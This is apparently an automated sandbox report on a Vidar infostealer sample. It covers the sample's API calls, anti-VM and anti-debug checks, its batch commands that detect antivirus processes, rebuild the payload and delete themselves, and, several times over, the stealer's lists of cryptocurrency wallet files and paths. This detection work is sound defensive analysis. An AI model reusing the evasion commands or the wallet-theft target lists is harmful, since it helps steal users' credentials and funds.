                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A087
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0102A570
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0101E472
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEC622 FindFirstFileExW,12_2_00FEC622
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010266DC FindFirstFileW,FindNextFileW,FindClose,12_2_010266DC
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01027333 FindFirstFileW,FindClose,12_2_01027333
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_010273D4
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101D921
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00FB5FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\623615\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: chrome.exe, 00000011.00000002.2637344997.000047E400074000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: Web Data.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: Web Data.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: chrome.exe, 00000011.00000002.2644529759.000047E401168000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: Web Data.22.drBinary or memory string: discord.comVMware20,11696487552f
                Source: Web Data.22.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: Wb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045A8000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3030376312.0000000001BCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Web Data.22.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: msedge.exe, 00000014.00000003.2697288580.00005B8002514000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: global block list test formVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: Web Data.22.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: chrome.exe, 00000011.00000002.2630172245.000001EE714E8000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2767628642.0000028218A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Web Data.22.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Web Data.22.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Web Data.22.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: chrome.exe, 00000011.00000002.2642507686.000047E400C78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=23632f1d-d6db-48ce-b80d-ec484711636a
                Source: Web Data.22.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: Web Data.22.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Web Data.22.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: Web Data.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102F4FF BlockInput,12_2_0102F4FF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00FB338B
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD5058 mov eax, dword ptr fs:[00000030h]12_2_00FD5058
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01012150 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,12_2_01012150
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FE2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00FE2992
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00FD0BAF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0D45 SetUnhandledExceptionFilter,12_2_00FD0D45
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00FD0F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01011B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_01011B4D
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00FB338B
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101BBED SendInput,keybd_event,12_2_0101BBED
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01032D37 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,12_2_01032D37
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DistancesJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Duck" Ix Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\623615\Wb.com Wb.com fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_010114AE
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01011FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_01011FB0
                Source: Wb.com, 0000000C.00000000.2155688568.0000000001073000.00000002.00000001.01000000.00000007.sdmp, Wb.com.2.dr, Ensures.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Wb.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0A08 cpuid 12_2_00FD0A08
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0100E5F4 GetLocalTime,12_2_0100E5F4
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0100E652 GetUserNameW,12_2_0100E652
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00FEBCD2
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
